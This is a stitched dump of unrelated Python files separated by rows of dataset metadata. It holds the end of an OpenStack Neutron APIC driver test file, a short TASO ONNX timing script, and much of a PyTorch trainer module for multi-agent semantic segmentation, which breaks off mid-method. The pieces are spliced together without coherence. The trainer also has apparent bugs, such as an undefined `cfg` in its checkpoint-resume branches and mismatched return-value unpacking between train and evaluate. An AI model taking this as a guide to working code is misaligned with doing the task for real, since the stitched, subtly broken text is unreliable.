def test_no_l3_in_gbp_details(self):
self._register_agent('h1')
self.driver._get_tenant_vrf = mock.MagicMock()
net = self.create_network(
tenant_id='onetenant', expected_res_status=201, shared=True,
is_admin_context=True)['network']
sub = self.create_subnet(
network_id=net['id'], cidr='192.168.0.0/24',
ip_version=4, is_admin_context=True)
with self.port(subnet=sub, tenant_id='anothertenant') as p1:
p1 = p1['port']
self.assertEqual(net['id'], p1['network_id'])
# Bind port to trigger path binding
self._bind_port_to_host(p1['id'], 'h1')
self.driver._add_ip_mapping_details = mock.Mock()
details = self._get_gbp_details(p1['id'], 'h1')
self.assertEqual(self._tenant(neutron_tenant='onetenant'),
details['ptg_tenant'])
self.assertEqual(self._app_profile(neutron_tenant='onetenant'),
details['app_profile_name'])
self.assertEqual('onetenant',
details['tenant_id'])
self.assertTrue(details['enable_dhcp_optimization'])
self.assertEqual(1, len(details['subnets']))
self.assertEqual(sub['subnet']['id'], details['subnets'][0]['id'])
self.assertIsNone(details.get('ip_mapping'))
self.assertIsNone(details.get('floating_ip'))
self.assertIsNone(details.get('host_snat_ips'))
self.driver._get_tenant_vrf.assert_called_with(net['tenant_id'])
def test_phys_port_on_shared_public_opflex_network(self):
pass
class TestExtensionAttributes(ApicML2IntegratedTestBase):
def test_route_leak_network_lifecycle(self):
net = self.create_network(
tenant_id='onetenant', expected_res_status=201)['network']
self.assertEqual(False,
net[ALLOW_ROUTE_LEAK])
net = self.create_network(
tenant_id='onetenant', expected_res_status=201,
**{'apic:allow_route_leak': 'True'})['network']
self.assertEqual(True,
net[ALLOW_ROUTE_LEAK])
# update is not allowed
self.update_network(
net['id'], expected_res_status=400,
**{'apic:allow_route_leak': 'False'})
self.assertEqual(True,
net[ALLOW_ROUTE_LEAK])
self.delete_network(net['id'], tenant_id=net['tenant_id'])
session = db_api.get_session()
extn = extn_db.ExtensionDbMixin()
self.assertFalse(extn.get_network_extn_db(session, net['id']))
def test_router_lifecycle(self):
session = db_api.get_session()
extn = extn_db.ExtensionDbMixin()
# default value
rtr0 = self.create_router(api=self.ext_api,
expected_res_status=201)['router']
self.assertEqual(None, rtr0[USE_ROUTING_CONTEXT])
self.assertFalse(extn.get_router_extn_db(session, rtr0['id']))
# bad value
self.create_router(api=self.ext_api,
expected_res_status=400,
**{'apic:use_routing_context': '12345'})
self.create_router(api=self.ext_api,
expected_res_status=500,
**{'apic:use_routing_context':
'39266936-70b8-437b-b779-74ae099ff0db'})
# good value
rtr1 = self.create_router(api=self.ext_api,
expected_res_status=201,
**{'apic:use_routing_context': rtr0['id']}
)['router']
self.assertEqual(rtr0['id'], rtr1[USE_ROUTING_CONTEXT])
self.assertEqual(extn.get_router_extn_db(session, rtr1['id']),
{'apic:use_routing_context': rtr0['id']})
# can't delete rtr0 now
self.delete_router(rtr0['id'], api=self.ext_api,
expected_res_status=500)
# update is not allowed
self.update_router(
rtr1['id'], api=self.ext_api,
expected_res_status=400,
**{'apic:use_routing_context': rtr1['id']})
# deletion
self.delete_router(rtr1['id'], api=self.ext_api,
expected_res_status=204)
# can delete rtr0 now after rtr1 is gone
self.delete_router(rtr0['id'], api=self.ext_api,
expected_res_status=204)
self.assertFalse(extn.get_router_extn_db(session, rtr1['id']))
class FakeNetworkContext(object):
"""To generate network context for testing purposes only."""
def __init__(self, network, segments):
self._network = network
self._segments = segments
self._plugin_context = mock.Mock()
@property
def current(self):
return self._network
@property
def network_segments(self):
return self._segments
class FakeSubnetContext(object):
"""To generate subnet context for testing purposes only."""
def __init__(self, subnet, network):
self._subnet = subnet
self._network = network
self._plugin = mock.Mock()
self._plugin_context = mock.Mock()
self._plugin.get_network.return_value = network.current
@property
def current(self):
return self._subnet
@property
def network(self):
return self._network
class FakePortContext(object):
"""To generate port context for testing purposes only."""
def __init__(self, port, network):
self._port = port
self._network = network
self._plugin = mock.Mock()
self._plugin_context = mock.Mock()
self._plugin.get_ports.return_value = []
if network.network_segments:
self._bound_segment = network.network_segments[0]
else:
self._bound_segment = None
self.current = self._port
self.original = self._port
self.network = self._network
self.top_bound_segment = self._bound_segment
self.bottom_bound_segment = self._bound_segment
self.host = self._port.get(portbindings.HOST_ID)
self.original_host = None
self.original_top_bound_segment = None
self.original_bottom_bound_segment = None
self._binding = mock.Mock()
self._binding.segment = self._bound_segment
def set_binding(self, segment_id, vif_type, cap_port_filter):
pass
| 49.295873
| 79
| 0.573653
| 30,448
| 267,578
| 4.684314
| 0.030872
| 0.03716
| 0.023221
| 0.015144
| 0.848228
| 0.822349
| 0.796513
| 0.768026
| 0.741047
| 0.7165
| 0
| 0.020725
| 0.323229
| 267,578
| 5,427
| 80
| 49.304957
| 0.766888
| 0.026762
| 0
| 0.70792
| 0
| 0.000845
| 0.081062
| 0.008536
| 0
| 0
| 0
| 0
| 0.103062
| 1
| 0.046463
| false
| 0.000845
| 0.007814
| 0.003379
| 0.067371
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d263b24f95b58b7b22856e2e314d24bf4c2b06b
| 377
|
py
|
Python
|
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
import taso
import onnx
graph = taso.load_onnx('onnx_models/resnext50.onnx')
print("graph.run_time(): {}ms".format(graph.run_time()))
print("graph.run_forward(): {}ms".format(graph.run_forward()))
graph = taso.load_onnx('onnx_models/resnext50_taso.onnx')
print("graph.run_time(): {}ms".format(graph.run_time()))
print("graph.run_forward(): {}ms".format(graph.run_forward()))
| 34.272727
| 62
| 0.734748
| 57
| 377
| 4.631579
| 0.22807
| 0.242424
| 0.19697
| 0.242424
| 0.909091
| 0.909091
| 0.909091
| 0.636364
| 0.636364
| 0.636364
| 0
| 0.011204
| 0.05305
| 377
| 10
| 63
| 37.7
| 0.728291
| 0
| 0
| 0.5
| 0
| 0
| 0.400531
| 0.151194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
adf63c30e8b4f72290a437effe7310d8c445a123
| 73,038
|
py
|
Python
|
ptsemseg/trainer.py
|
PhyllisH/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 30
|
2020-06-16T00:19:19.000Z
|
2022-03-18T19:37:48.000Z
|
ptsemseg/trainer.py
|
hyzcn/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 2
|
2021-11-08T01:46:18.000Z
|
2021-11-18T06:45:06.000Z
|
ptsemseg/trainer.py
|
hyzcn/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 8
|
2020-07-09T03:08:45.000Z
|
2022-03-24T16:07:29.000Z
|
import os
import yaml
import time
import shutil
import torch
import random
import argparse
import numpy as np
import copy
import timeit
import statistics
import datetime
from torch.utils import data
from tqdm import tqdm
import cv2
from ptsemseg.process_img import generate_noise
from ptsemseg.models import get_model
from ptsemseg.loss import get_loss_function
from ptsemseg.loader import get_loader
from ptsemseg.utils import get_logger, init_weights
from ptsemseg.metrics import runningScore, averageMeter
from ptsemseg.augmentations import get_composed_augmentations
from ptsemseg.schedulers import get_scheduler
from ptsemseg.optimizers import get_optimizer
from ptsemseg.utils import convert_state_dict
from tensorboardX import SummaryWriter
class Trainer_LearnWhen2Com(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.loss_fn = loss_fn
self.n_classes = 11
self.MO_flag = self.cfg['model']['multiple_output']
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
start_iter = 0
# resume the training
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
# Training
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
# iteration timer
i += 1
# load data from dataloader
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
# image and labels list 2 tensor
labels = labels_list[0]
images = torch.cat(tuple(images_list), dim=1)
# timer started
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
# from cpu to gpu
images = images.to(self.device)
labels = labels.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
# clean the optimizer
self.optimizer.zero_grad()
# model inference
outputs, log_action, action_argmax = self.model(images, training=True)
# compute loss
loss = self.loss_fn(input=outputs, target=labels)
# compute the gradient for each variable
loss.backward()
# update the weight
self.optimizer.step()
# compute the used time
time_meter.update(time.time() - start_ts)
# Process display on screen
if (i + 1) % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i + 1,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
time_meter.reset()
# Validation (During training)
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
total = 0
correct_when = 0
correct_who = 0
for i_val, data_list in tqdm(enumerate(self.valloader)):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
else:
images_val_list, labels_val_list = data_list
labels_val = labels_val_list[0]
images_val = torch.cat(tuple(images_val_list), dim=1)
labels_val = labels_val.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
images_val = images_val.to(self.device)
gt = labels_val.data.cpu().numpy()
# image loss
outputs, _, action_argmax = self.model(images_val, training=True)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
action_argmax = torch.squeeze(action_argmax)
# compute action accuracy
if self.if_commun_label != 'None':
self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax)
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
if self.if_commun_label != 'None':
when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
else:
when2com_acc = 0
who2com_acc = 0
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
scorers = [self.running_metrics_val]
for idx, scorer in enumerate(scorers):
score, class_iou = scorer.get_scores()
for k, v in score.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/{}".format(idx, k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/cls_{}".format(idx, k), v, i)
# print
print('Normal')
score, class_iou = self.running_metrics_val.get_only_normal_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = self.running_metrics_val.get_only_noise_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = self.running_metrics_val.get_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader, inference_mode='activated'): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multiple output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
outputs, _, action_argmax, _ = self.model(images, training=False, inference=inference_mode)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_LearnWho2Com(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.loss_fn = loss_fn
self.MO_flag = self.cfg['model']['multiple_output']
self.n_classes = 11
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
# some datasets have no labels for communication
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
start_iter = 0
print('learnwho2com trainer')
# resume the training
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
# Training
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
# iteration timer
i += 1
# load data from dataloader
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
# image and labels list 2 tensor
labels = labels_list[0]
images = torch.cat(tuple(images_list), dim=1)
# timer started
start_ts = time.time()
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
# from cpu to gpu
images = images.to(self.device)
labels = labels.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
# clean the optimizer
self.optimizer.zero_grad()
# model inference
outputs, log_action, action_argmax = self.model(images, training=True)
# compute loss
loss = self.loss_fn(input=outputs, target=labels)
# compute the gradient for each variable
loss.backward()
# update the weight
self.optimizer.step()
# compute the used time
time_meter.update(time.time() - start_ts)
# Process display on screen
if (i + 1) % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i + 1,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
time_meter.reset()
# Validation (During training)
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
total = 0
correct_when = 0
correct_who = 0
for i_val, data_list in tqdm(enumerate(self.valloader)):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
else:
images_val_list, labels_val_list = data_list
labels_val = labels_val_list[0]
images_val = torch.cat(tuple(images_val_list), dim=1)
labels_val = labels_val.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
images_val = images_val.to(self.device)
gt = labels_val.data.cpu().numpy()
# image loss
outputs, _, action_argmax = self.model(images_val, training=True)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
action_argmax = torch.squeeze(action_argmax)
# compute action accuracy
if self.if_commun_label != 'None':
self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax + 1)
# plus one since target is not included in "alwaysCom" model
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
if self.if_commun_label != 'None':
when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
else:
when2com_acc = 0
who2com_acc = 0
# for tensorboard
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
scorers = [self.running_metrics_val]
for idx, scorer in enumerate(scorers):
score, class_iou = scorer.get_scores()
for k, v in score.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/{}".format(idx, k), v, i)
for k, v in class_iou.items():
self.logger.info("{}: {}".format(k, v))
self.writer.add_scalar("head_{}_val_metrics/cls_{}".format(idx, k), v, i)
# print
print('Normal')
score, class_iou = self.running_metrics_val.get_only_normal_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = self.running_metrics_val.get_only_noise_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = self.running_metrics_val.get_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
val_loss_meter.reset()
self.running_metrics_val.reset()
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader, inference_mode='argmax_test'): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multi-view output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
# MODEL INFERENCE
outputs, action, action_argmax = self.model(images, training=False, inference=inference_mode)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax+1)
if self.if_commun_label:
when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
else:
when2com_acc = 0
who2com_acc = 0
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_MIMOcom(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
# some datasets have no labels for communication
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
# load model
print('LearnMIMOCom_Trainer')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
self.optimizer.load_state_dict(checkpoint["optimizer_state"])
self.scheduler.load_state_dict(checkpoint["scheduler_state"])
start_iter = checkpoint["epoch"]
self.logger.info(
"Loaded checkpoint '{}' (iter {})".format(
self.cfg["training"]["resume"], checkpoint["epoch"]
)
)
else:
self.logger.info("No checkpoint found at '{}'".format(self.cfg["training"]["resume"]))
val_loss_meter = averageMeter()
time_meter = averageMeter()
best_iou = -100.0
i = start_iter
flag = True
# training
while i <= self.cfg["training"]["train_iters"] and flag:
for data_list in self.trainloader:
i += 1
start_ts = time.time()
if self.if_commun_label != 'None':
images_list, labels_list, commun_label = data_list
else:
images_list, labels_list = data_list
images = torch.cat(tuple(images_list), dim=1)
if self.MO_flag: # multiple output
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
self.scheduler.step()
self.model.train() # matters for batchnorm/dropout
images = images.to(self.device)
labels = labels.to(self.device)
if self.if_commun_label != 'None':
commun_label = commun_label.to(self.device)
# image loss
self.optimizer.zero_grad()
outputs, log_action, action_argmax, _ = self.model(images, training=True, MO_flag=self.MO_flag)
loss = self.loss_fn(input=outputs, target=labels)
loss.backward()
self.optimizer.step()
time_meter.update(time.time() - start_ts)
# Process display on screen
if (i + 1) % self.cfg["training"]["print_interval"] == 0:
fmt_str = "Iter [{:d}/{:d}] Loss: {:.4f} Time/Image: {:.4f}"
print_str = fmt_str.format(
i + 1,
self.cfg["training"]["train_iters"],
loss.item(),
time_meter.avg / self.cfg["training"]["batch_size"],
)
print(print_str)
self.logger.info(print_str)
self.writer.add_scalar("loss/train_loss", loss.item(), i + 1)
time_meter.reset()
### Validation
if i % self.cfg["training"]["val_interval"] == 0 or i == self.cfg["training"]["train_iters"]:
self.model.eval()
with torch.no_grad():
for i_val, data_list in tqdm(enumerate(self.valloader)):
if self.if_commun_label != 'None':
images_val_list, labels_val_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_val_list, labels_val_list = data_list
images_val = torch.cat(tuple(images_val_list), dim=1)
if self.MO_flag: # obtain multiple ground-truth
labels_val = torch.cat(tuple(labels_val_list), dim=0)
else: # only select one view gt mask
labels_val = labels_val_list[0]
labels_val = labels_val.to(self.device)
images_val = images_val.to(self.device)
gt = labels_val.data.cpu().numpy()
# image loss
outputs, _, action_argmax, _ = self.model(images_val, training=True, MO_flag=self.MO_flag)
val_loss = self.loss_fn(input=outputs, target=labels_val)
pred = outputs.data.max(1)[1].cpu().numpy()
# compute action accuracy
if self.if_commun_label != 'None':
self.running_metrics_val.update_div(self.if_commun_label, gt, pred, commun_label)
self.running_metrics_val.update_selection(self.if_commun_label, commun_label, action_argmax)
self.running_metrics_val.update(gt, pred)
val_loss_meter.update(val_loss.item())
if self.if_commun_label != 'None':
when2com_acc, who2com_acc = self.running_metrics_val.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
self.writer.add_scalar("val_metrics/when_com_accuacy", when2com_acc, i)
self.writer.add_scalar("val_metrics/who_com_accuracy", who2com_acc, i)
self.writer.add_scalar("loss/val_loss", val_loss_meter.avg, i)
self.logger.info("Iter %d Loss: %.4f" % (i, val_loss_meter.avg))
print('Normal')
score, class_iou = self.running_metrics_val.get_only_normal_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = self.running_metrics_val.get_only_noise_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = self.running_metrics_val.get_scores()
self.running_metrics_val.print_score(self.n_classes, score, class_iou)
val_loss_meter.reset()
self.running_metrics_val.reset()
# store the best model
if score["Mean IoU : \t"] >= best_iou:
best_iou = score["Mean IoU : \t"]
state = {
"epoch": i,
"model_state": self.model.state_dict(),
"optimizer_state": self.optimizer.state_dict(),
"scheduler_state": self.scheduler.state_dict(),
"best_iou": best_iou,
}
save_path = os.path.join(
self.writer.file_writer.get_logdir(),
"{}_{}_best_model.pkl".format(self.cfg["model"]["arch"], self.cfg["data"]["dataset"]),
)
torch.save(state, save_path)
if i == self.cfg["training"]["train_iters"]:
flag = False
break
return save_path
def load_weight(self, model_path):
state = convert_state_dict(torch.load(model_path)["model_state"])
self.model.load_state_dict(state, strict=False)
def evaluate(self, testloader,inference_mode='activated'): # "val_split"
running_metrics = runningScore(self.n_classes)
# Setup Model
self.model.eval()
self.model.to(self.device)
for i, data_list in enumerate(testloader):
if self.if_commun_label:
images_list, labels_list, commun_label = data_list
commun_label = commun_label.to(self.device)
else:
images_list, labels_list = data_list
# multi-view inputs
images = torch.cat(tuple(images_list), dim=1)
# multiple output
if self.MO_flag:
labels = torch.cat(tuple(labels_list), dim=0)
else: # single output
labels = labels_list[0]
images = images.to(self.device)
outputs, _, action_argmax, bandW = self.model(images, training=False, MO_flag=self.MO_flag, inference=inference_mode)
pred = outputs.data.max(1)[1].cpu().numpy()
gt = labels.numpy()
# measurement results
running_metrics.update(gt, pred)
running_metrics.update_bandW(bandW)
if self.if_commun_label:
running_metrics.update_div(self.if_commun_label, gt, pred, commun_label)
running_metrics.update_selection(self.if_commun_label, commun_label, action_argmax)
if self.if_commun_label:
when2com_acc, who2com_acc = running_metrics.get_selection_accuracy()
print('Validation when2com accuracy:{}'.format(when2com_acc))
print('Validation who2com accuracy:{}'.format(who2com_acc))
else:
when2com_acc = 0
who2com_acc = 0
avg_bandW = running_metrics.get_avg_bandW()
print('Bandwidth: ' + str(avg_bandW))
print('Normal')
score, class_iou = running_metrics.get_only_normal_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print('Noise')
score, class_iou = running_metrics.get_only_noise_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
print("Overall")
score, class_iou = running_metrics.get_scores()
running_metrics.print_score(self.n_classes, score, class_iou)
return score, class_iou
class Trainer_MIMOcomWho(object):
def __init__(self, cfg, writer, logger, model, loss_fn, trainloader, valloader, optimizer, scheduler, device):
self.cfg = cfg
self.writer = writer
self.logger = logger
self.model = model
self.trainloader = trainloader
self.valloader = valloader
self.optimizer = optimizer
self.scheduler = scheduler
self.n_classes = 11
self.loss_fn = loss_fn
self.running_metrics_val = runningScore(self.n_classes)
self.device = device
self.MO_flag = self.cfg['model']['multiple_output']
# some datasets have no labels for communication
if 'commun_label' in self.cfg["data"]:
self.if_commun_label = cfg["data"]['commun_label']
else:
self.if_commun_label = 'None'
def train(self):
# load model
print('LearnMIMOComWho_Trainer')
start_iter = 0
if self.cfg["training"]["resume"] is not None:
if os.path.isfile(self.cfg["training"]["resume"]):
self.logger.info(
"Loading model and optimizer from checkpoint '{}'".format(self.cfg["training"]["resume"])
)
checkpoint = torch.load(self.cfg["training"]["resume"])
self.model.load_state_dict(checkpoint["model_state"])
